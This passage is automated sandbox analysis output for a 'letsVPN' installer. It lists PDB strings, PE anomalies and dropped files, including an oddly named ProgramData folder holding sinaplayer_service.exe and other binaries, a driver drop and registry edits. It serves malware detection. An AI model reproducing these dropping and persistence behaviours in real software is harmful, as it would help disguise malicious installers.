00000013.00000003.2470923319.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2387968776.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2417838624.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2488461135.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375693525.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2410190709.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2389683427.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2541088623.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.23
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: letsvpn-latest.exe, 00000013.00000003.2473661260.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: letsvpn-latest.exe, 00000013.00000003.2435858420.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: letsvpn-latest.exe, 00000013.00000003.2470389956.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: letsvpn-latest.exe, 00000013.00000003.2379177568.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: letsvpn-latest.exe, 00000013.00000003.2359617621.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2474107011.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: letsvpn-latest.exe, 00000013.00000003.2328342525.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2444933089.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: letsvpn-latest.exe, 00000013.00000003.2388837865.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2471020373.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: letsvpn-latest.exe, 00000013.00000003.2351921276.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3935799668.000000002F832000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2486397887.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2388106062.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2479437408.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: letsvpn-latest.exe, 00000013.00000003.2411045465.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2481269690.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: letsvpn-latest.exe, 00000013.00000003.2506430141.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: letsvpn-latest.exe, 00000013.00000003.2469739574.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdbR source: letsvpn-latest.exe, 00000013.00000003.2387260703.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: letsvpn-latest.exe, 00000013.00000003.2437133707.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2502768386.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: letsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: letsvpn-latest.exe, 00000013.00000003.2489862982.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: letsvpn-latest.exe, 00000013.00000003.2389768364.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: letsvpn-latest.exe, 00000013.00000003.2410292995.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2360771712.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: letsvpn-latest.exe, 00000013.00000003.2441430774.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: letsvpn-latest.exe, 00000013.00000003.2467995068.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: letsvpn-latest.exe, 00000013.00000003.2484002109.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: letsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: letsvpn-latest.exe, 00000013.00000003.2406644681.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: letsvpn-latest.exe, 00000013.00000003.2364198304.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: letsvpn-latest.exe, 00000013.00000003.2471668940.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2377902690.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: letsvpn-latest.exe, 00000013.00000003.2497867835.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2422053301.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: letsvpn-latest.exe, 00000013.00000003.2351037678.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001C.00000002.2683090826.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001C.00000000.2681003659.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000000.2683431431.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000002.2728411628.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000002.2736525094.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000000.2729197986.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: letsvpn-latest.exe, 00000013.00000003.2420064156.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: letsvpn-latest.exe, 00000013.00000003.2363516673.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: letsvpn-latest.exe, 00000013.00000003.2444933089.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2455636991.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: letsvpn-latest.exe, 00000013.00000003.2446092448.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: letsvpn-latest.exe, 00000013.00000003.2392116822.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2355870263.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2411809176.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: letsvpn-latest.exe, 00000013.00000003.2461351463.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: letsvpn-latest.exe, 00000013.00000003.2424521311.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: letsvpn-latest.exe, 00000013.00000003.2417185734.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: letsvpn-latest.exe, 00000013.00000003.2408789957.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: letsvpn-latest.exe, 00000013.00000003.2352489250.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: System.Web.Services.Description.resources.dll.19.drStatic PE information: 0x98399BEE [Tue Dec 6 04:05:02 2050 UTC]
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800057CD LoadLibraryW,GetProcAddress,ShellExecuteW,LoadLibraryW,GetProcAddress,Sleep,SleepEx,DeleteFileW,CreateDirectoryW,Sleep,SleepEx,Sleep,SleepEx,ShellExecuteW,Sleep,SleepEx,Sleep,SleepEx,DeleteFileW,DeleteFileW,DeleteFileW,std::ios_base::_Ios_base_dtor,0_2_00000001800057CD
              Source: FileSplit.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x19e98
              Source: s.0.drStatic PE information: real checksum: 0x26890d should be: 0x1370ba
              Source: System.dll.19.drStatic PE information: real checksum: 0x0 should be: 0x39be
              Source: e_sqlite3.dll0.19.drStatic PE information: section name: _RDATA
              Source: WebView2Loader.dll.19.drStatic PE information: section name: .00cfg
              Source: WebView2Loader.dll.19.drStatic PE information: section name: _RDATA
              Source: WebView2Loader.dll0.19.drStatic PE information: section name: .00cfg
              Source: WebView2Loader.dll0.19.drStatic PE information: section name: .voltbl
              Source: ndp462-web.exe.19.drStatic PE information: section name: .boxld01
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00397D65 push ecx; ret 17_2_00397D78
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C55EDC3 push ecx; ret 17_2_6C55EDD6
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5649D7 push ecx; ret 17_2_6C5649EA
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C587BA8 pushad ; iretd 17_2_6C587BB6
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5852B4 push eax; ret 17_2_6C5852D2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00C86820 push eax; ret 24_2_00C86833
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00C85EF0 push 8B059523h; retf 24_2_00C85EF5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00C80FB0 push eax; ret 24_2_00C80FBA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_074129A0 pushad ; retf 00B4h24_2_07412B3D
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00858835 push ecx; ret 53_2_00858848
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00858C76 push ecx; ret 53_2_00858C89
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_012D7040 pushad ; iretd 54_2_012D7059
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_012DB2F0 pushad ; ret 54_2_012DB303
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_012D6BC0 pushad ; retf 54_2_012D6BC1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_012D5D78 push esp; ret 54_2_012D5D79
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeCode function: 54_2_05875290 pushfd ; ret 54_2_05875299
              Source: msvcr120.dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
              Source: msvcr120.dll.17.drStatic PE information: section name: .text entropy: 6.95576372950548
              Source: e_sqlite3.dll.19.drStatic PE information: section name: .text entropy: 7.128615396301837

              Persistence and Installation Behavior

              barindex
              Sample is not signed and drops a device driver
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Uses ipconfig to lookup or modify the Windows network settings
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
              Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\base.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\FileSplit.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsDialogs.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Reader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Csp.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.StackTrace.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ru\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-arm\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsExec.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.ClientEngine.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC5C.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Windows.Interactivity.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exeJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\sJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Permissions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Common.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\msvcr120.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\0zVlL\Jd0i4~16\msvcp120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.DriveInfo.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\LetsPRO.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.RegularExpressions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.IPNetwork.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.ProtectedData.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Ports.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\WpfAnimatedGif.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Expressions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.ReaderWriter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Duplex.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Web.Services.Description.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tracing.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ValueTuple.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceProcess.ServiceController.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\x64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-TW\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.XDocument.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dllJump to dropped file
